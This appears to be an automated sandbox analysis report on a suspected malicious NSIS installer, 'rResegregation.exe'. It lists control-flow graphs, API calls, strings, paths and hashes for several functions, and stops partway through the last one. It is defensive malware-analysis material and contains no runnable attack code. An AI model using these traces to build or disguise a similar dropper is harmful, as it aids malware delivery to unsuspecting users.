                                                                  Function 004055AE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 485 4055ae-4055d4 call 40586c 488 4055d6-4055e8 DeleteFileA 485->488 489 4055ed-4055f4 485->489 490 405777-40577b 488->490 491 4055f6-4055f8 489->491 492 405607-405617 call 405d0c 489->492 493 405725-40572a 491->493 494 4055fe-405601 491->494 498 405626-405627 call 4057c5 492->498 499 405619-405624 lstrcatA 492->499 493->490 497 40572c-40572f 493->497 494->492 494->493 500 405731-405737 497->500 501 405739-405741 call 406010 497->501 502 40562c-40562f 498->502 499->502 500->490 501->490 508 405743-405757 call 40577e call 405566 501->508 506 405631-405638 502->506 507 40563a-405640 lstrcatA 502->507 506->507 509 405645-405663 lstrlenA FindFirstFileA 506->509 507->509 523 405759-40575c 508->523 524 40576f-405772 call 404f25 508->524 511 405669-405680 call 4057a9 509->511 512 40571b-40571f 509->512 519 405682-405686 511->519 520 40568b-40568e 511->520 512->493 514 405721 512->514 514->493 519->520 525 405688 519->525 521 405690-405695 520->521 522 4056a1-4056af call 405d0c 520->522 526 405697-405699 521->526 527 4056fa-40570c FindNextFileA 521->527 535 4056b1-4056b9 522->535 536 4056c6-4056d1 call 405566 522->536 523->500 529 40575e-40576d call 404f25 call 405bc7 523->529 524->490 525->520 526->522 531 40569b-40569f 526->531 527->511 533 405712-405715 FindClose 527->533 529->490 531->522 531->527 533->512 535->527 538 4056bb-4056c4 call 4055ae 535->538 545 4056f2-4056f5 call 404f25 536->545 546 4056d3-4056d6 536->546 538->527 545->527 548 4056d8-4056e8 call 404f25 call 405bc7 546->548 549 4056ea-4056f0 546->549 548->527 549->527
                                                                  APIs
                                                                  • DeleteFileA.KERNELBASE(?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055D7
                                                                  • lstrcatA.KERNEL32(Mundstykket.min,\*.*,Mundstykket.min,?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040561F
                                                                  • lstrcatA.KERNEL32(?,00409014,?,Mundstykket.min,?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405640
                                                                  • lstrlenA.KERNEL32(?,?,00409014,?,Mundstykket.min,?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405646
                                                                  • FindFirstFileA.KERNELBASE(Mundstykket.min,?,?,?,00409014,?,Mundstykket.min,?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405657
                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405704
                                                                  • FindClose.KERNEL32(00000000), ref: 00405715
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$C:\Users\user\AppData\Local\Temp\$Mundstykket.min$\*.*
                                                                  • API String ID: 2035342205-2800903699
                                                                  • Opcode ID: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                  • Instruction ID: 15aabf9ae26d8a027305d4c4078bc37ad96aa8a5c182164a2950041f9cf2f42d
                                                                  • Opcode Fuzzy Hash: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                  • Instruction Fuzzy Hash: C651DF30800A04BADB21AB618C45BBF7A78DF42355F54857BF449B61D2D73C4981EE6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406010 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileA.KERNELBASE(76483410,0079FD90,Mundstykket.min,004058AF,Mundstykket.min,Mundstykket.min,00000000,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\), ref: 0040601B
                                                                  • FindClose.KERNELBASE(00000000), ref: 00406027
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: Mundstykket.min
                                                                  • API String ID: 2295610775-3661976162
                                                                  • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                  • Instruction ID: 592bcfe3733b0aa744bdfcff45d7cd7e76fdd068ce72c1f71716353b7d55c377
                                                                  • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                  • Instruction Fuzzy Hash: 02D012319491305BC714977C7D4C84F7A6C9B193717114A32F46AF12E0C6749CA286E9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403A1E Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 179 403a1e-403a30 180 403b71-403b80 179->180 181 403a36-403a3c 179->181 183 403b82-403bca GetDlgItem * 2 call 403ef1 SetClassLongA call 40140b 180->183 184 403bcf-403be4 180->184 181->180 182 403a42-403a4b 181->182 187 403a60-403a63 182->187 188 403a4d-403a5a SetWindowPos 182->188 183->184 185 403c24-403c29 call 403f3d 184->185 186 403be6-403be9 184->186 201 403c2e-403c49 185->201 191 403beb-403bf6 call 401389 186->191 192 403c1c-403c1e 186->192 194 403a65-403a77 ShowWindow 187->194 195 403a7d-403a83 187->195 188->187 191->192 214 403bf8-403c17 SendMessageA 191->214 192->185 200 403ebe 192->200 194->195 197 403a85-403a9a DestroyWindow 195->197 198 403a9f-403aa2 195->198 204 403e9b-403ea1 197->204 205 403aa4-403ab0 SetWindowLongA 198->205 206 403ab5-403abb 198->206 202 403ec0-403ec7 200->202 208 403c52-403c58 201->208 209 403c4b-403c4d call 40140b 201->209 204->200 215 403ea3-403ea9 204->215 205->202 212 403ac1-403ad2 GetDlgItem 206->212 213 403b5e-403b6c call 403f58 206->213 210 403e7c-403e95 DestroyWindow EndDialog 208->210 211 403c5e-403c69 208->211 209->208 210->204 211->210 217 403c6f-403cbc call 405d2e call 403ef1 * 3 GetDlgItem 211->217 218 403af1-403af4 212->218 219 403ad4-403aeb SendMessageA IsWindowEnabled 212->219 213->202 214->202 215->200 221 403eab-403eb4 ShowWindow 215->221 249 403cc6-403d02 ShowWindow KiUserCallbackDispatcher call 403f13 EnableWindow 217->249 250 403cbe-403cc3 217->250 223 403af6-403af7 218->223 224 403af9-403afc 218->224 219->200 219->218 221->200 227 403b27-403b2c call 403eca 223->227 228 403b0a-403b0f 224->228 229 403afe-403b04 224->229 227->213 232 403b45-403b58 SendMessageA 228->232 234 403b11-403b17 228->234 229->232 233 403b06-403b08 229->233 232->213 233->227 237 403b19-403b1f call 40140b 234->237 238 403b2e-403b37 call 40140b 234->238 245 403b25 237->245 238->213 247 403b39-403b43 238->247 245->227 247->245 253 403d04-403d05 249->253 254 403d07 249->254 250->249 255 403d09-403d37 GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d39-403d4a SendMessageA 255->256 257 403d4c 255->257 258 403d52-403d8b call 403f26 call 405d0c lstrlenA call 405d2e SetWindowTextA call 401389 256->258 257->258 258->201 267 403d91-403d93 258->267 267->201 268 403d99-403d9d 267->268 269 403dbc-403dd0 DestroyWindow 268->269 270 403d9f-403da5 268->270 269->204 271 403dd6-403e03 CreateDialogParamA 269->271 270->200 272 403dab-403db1 270->272 271->204 274 403e09-403e60 call 403ef1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 271->274 272->201 273 403db7 272->273 273->200 274->200 279 403e62-403e75 ShowWindow call 403f3d 274->279 281 403e7a 279->281 281->204
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5A
                                                                  • ShowWindow.USER32(?), ref: 00403A77
                                                                  • DestroyWindow.USER32 ref: 00403A8B
                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403AA7
                                                                  • GetDlgItem.USER32(?,?), ref: 00403AC8
                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ADC
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403AE3
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403B91
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403B9B
                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403BB5
                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C06
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403CAC
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403CCD
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CDF
                                                                  • EnableWindow.USER32(?,?), ref: 00403CFA
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D10
                                                                  • EnableMenuItem.USER32(00000000), ref: 00403D17
                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D2F
                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D42
                                                                  • lstrlenA.KERNEL32(0079E540,?,0079E540,Bortdmmer Setup), ref: 00403D6B
                                                                  • SetWindowTextA.USER32(?,0079E540), ref: 00403D7A
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403EAE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID: @y$Bortdmmer Setup
                                                                  • API String ID: 3282139019-1671991744
                                                                  • Opcode ID: cc9d0d33d140f6c7f3dfcc1daafeed48d3c30ff6fb1dcf2fe60019aa41219e48
                                                                  • Instruction ID: 604a4885fc931abc1044a41a4cf0f2958d917e977c7d56f4e50accb35e18e33b
                                                                  • Opcode Fuzzy Hash: cc9d0d33d140f6c7f3dfcc1daafeed48d3c30ff6fb1dcf2fe60019aa41219e48
                                                                  • Instruction Fuzzy Hash: F1C1AE31904205ABEB216F61ED85E2B3EACEB4574AF00453EF501B11F1C739A942DB5E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040368C Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 282 40368c-4036a4 call 4060a5 285 4036a6-4036b6 call 405c6a 282->285 286 4036b8-4036e9 call 405bf3 282->286 295 40370c-403735 call 403951 call 40586c 285->295 291 403701-403707 lstrcatA 286->291 292 4036eb-4036fc call 405bf3 286->292 291->295 292->291 300 40373b-403740 295->300 301 4037bc-4037c4 call 40586c 295->301 300->301 302 403742-403766 call 405bf3 300->302 307 4037d2-4037f7 LoadImageA 301->307 308 4037c6-4037cd call 405d2e 301->308 302->301 309 403768-40376a 302->309 311 403878-403880 call 40140b 307->311 312 4037f9-403829 RegisterClassA 307->312 308->307 313 40377b-403787 lstrlenA 309->313 314 40376c-403779 call 4057a9 309->314 323 403882-403885 311->323 324 40388a-403895 call 403951 311->324 315 403947 312->315 316 40382f-403873 SystemParametersInfoA CreateWindowExA 312->316 321 403789-403797 lstrcmpiA 313->321 322 4037af-4037b7 call 40577e call 405d0c 313->322 314->313 320 403949-403950 315->320 316->311 321->322 327 403799-4037a3 GetFileAttributesA 321->327 322->301 323->320 335 40389b-4038b5 ShowWindow call 406037 324->335 336 40391e-40391f call 404ff7 324->336 330 4037a5-4037a7 327->330 331 4037a9-4037aa call 4057c5 327->331 330->322 330->331 331->322 343 4038c1-4038d3 GetClassInfoA 335->343 344 4038b7-4038bc call 406037 335->344 339 403924-403926 336->339 341 403940-403942 call 40140b 339->341 342 403928-40392e 339->342 341->315 342->323 345 403934-40393b call 40140b 342->345 348 4038d5-4038e5 GetClassInfoA RegisterClassA 343->348 349 4038eb-40390e DialogBoxParamA call 40140b 343->349 344->343 345->323 348->349 353 403913-40391c call 4035dc 349->353 353->320
                                                                  APIs
                                                                    • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                    • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                  • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,76483410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rResegregation.exe",00000000), ref: 00403707
                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,76483410), ref: 0040377C
                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 0040378F
                                                                  • GetFileAttributesA.KERNEL32(Call), ref: 0040379A
                                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet), ref: 004037E3
                                                                    • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                  • RegisterClassA.USER32(007A16E0), ref: 00403820
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403838
                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040386D
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 004038A3
                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 004038CF
                                                                  • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 004038DC
                                                                  • RegisterClassA.USER32(007A16E0), ref: 004038E5
                                                                  • DialogBoxParamA.USER32(?,00000000,00403A1E,00000000), ref: 00403904
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                  • API String ID: 1975747703-323482368
                                                                  • Opcode ID: 5ab0478d8d29fcc30d6f86d58a97276ab6e1e5173614108ac56cb6ac56f41f24
                                                                  • Instruction ID: b6748c6733e3bb55aa357910a2c4fdec813f4d760fd6ac6bc3454eeade69f907
                                                                  • Opcode Fuzzy Hash: 5ab0478d8d29fcc30d6f86d58a97276ab6e1e5173614108ac56cb6ac56f41f24
                                                                  • Instruction Fuzzy Hash: D06106B4504244AEE710AF659C45F3B3AACEB85789F00857FF900B22E1D77CAD019B2D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 356 402c66-402cb4 GetTickCount GetModuleFileNameA call 40597f 359 402cc0-402cee call 405d0c call 4057c5 call 405d0c GetFileSize 356->359 360 402cb6-402cbb 356->360 368 402cf4 359->368 369 402ddb-402de9 call 402c02 359->369 361 402e98-402e9c 360->361 371 402cf9-402d10 368->371 375 402deb-402dee 369->375 376 402e3e-402e43 369->376 373 402d12 371->373 374 402d14-402d1d call 40308e 371->374 373->374 383 402d23-402d2a 374->383 384 402e45-402e4d call 402c02 374->384 378 402df0-402e08 call 4030a4 call 40308e 375->378 379 402e12-402e3c GlobalAlloc call 4030a4 call 402e9f 375->379 376->361 378->376 406 402e0a-402e10 378->406 379->376 405 402e4f-402e60 379->405 388 402da6-402daa 383->388 389 402d2c-402d40 call 40593a 383->389 384->376 394 402db4-402dba 388->394 395 402dac-402db3 call 402c02 388->395 389->394 403 402d42-402d49 389->403 396 402dc9-402dd3 394->396 397 402dbc-402dc6 call 40611a 394->397 395->394 396->371 404 402dd9 396->404 397->396 403->394 409 402d4b-402d52 403->409 404->369 410 402e62 405->410 411 402e68-402e6d 405->411 406->376 406->379 409->394 412 402d54-402d5b 409->412 410->411 413 402e6e-402e74 411->413 412->394 414 402d5d-402d64 412->414 413->413 415 402e76-402e91 SetFilePointer call 40593a 413->415 414->394 416 402d66-402d86 414->416 419 402e96 415->419 416->376 418 402d8c-402d90 416->418 420 402d92-402d96 418->420 421 402d98-402da0 418->421 419->361 420->404 420->421 421->394 422 402da2-402da4 421->422 422->394
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402C77
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\rResegregation.exe,00000400), ref: 00402C93
                                                                    • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 00405983
                                                                    • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                  • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rResegregation.exe,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 00402CDF
                                                                  Strings
                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                  • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                  • C:\Users\user\Desktop\rResegregation.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                  • Error launching installer, xrefs: 00402CB6
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                  • "C:\Users\user\Desktop\rResegregation.exe", xrefs: 00402C66
                                                                  • Null, xrefs: 00402D5D
                                                                  • soft, xrefs: 00402D54
                                                                  • Inst, xrefs: 00402D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rResegregation.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                  • API String ID: 4283519449-2449525394
                                                                  • Opcode ID: ade385f577374e8dc66d5b5cc495e95f7f1f773012bbca210bc499bf2ace4bcf
                                                                  • Instruction ID: fe9ef23653e85685a193ad9c5457c4b2e55d644b791d7b95544962d8ab1ad500
                                                                  • Opcode Fuzzy Hash: ade385f577374e8dc66d5b5cc495e95f7f1f773012bbca210bc499bf2ace4bcf
                                                                  • Instruction Fuzzy Hash: CC51F471941214AFEB119F65DE89B9E7BA8EF04364F14803BF904B62D1D7BC8D408BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 554 401751-401774 call 402a3a call 4057eb 559 401776-40177c call 405d0c 554->559 560 40177e-401790 call 405d0c call 40577e lstrcatA 554->560 565 401795-40179b call 405f77 559->565 560->565 570 4017a0-4017a4 565->570 571 4017a6-4017b0 call 406010 570->571 572 4017d7-4017da 570->572 580 4017c2-4017d4 571->580 581 4017b2-4017c0 CompareFileTime 571->581 573 4017e2-4017fe call 40597f 572->573 574 4017dc-4017dd call 40595a 572->574 582 401800-401803 573->582 583 401876-40189f call 404f25 call 402e9f 573->583 574->573 580->572 581->580 584 401805-401847 call 405d0c * 2 call 405d2e call 405d0c call 405502 582->584 585 401858-401862 call 404f25 582->585 597 4018a1-4018a5 583->597 598 4018a7-4018b3 SetFileTime 583->598 584->570 617 40184d-40184e 584->617 595 40186b-401871 585->595 600 4028d8 595->600 597->598 599 4018b9-4018c4 CloseHandle 597->599 598->599 602 4018ca-4018cd 599->602 603 4028cf-4028d2 599->603 604 4028da-4028de 600->604 606 4018e2-4018e5 call 405d2e 602->606 607 4018cf-4018e0 call 405d2e lstrcatA 602->607 603->600 613 4018ea-402273 call 405502 606->613 607->613 613->604 617->595 619 401850-401851 617->619 619->585
                                                                  APIs
                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre,00000000,00000000,00000031), ref: 00401790
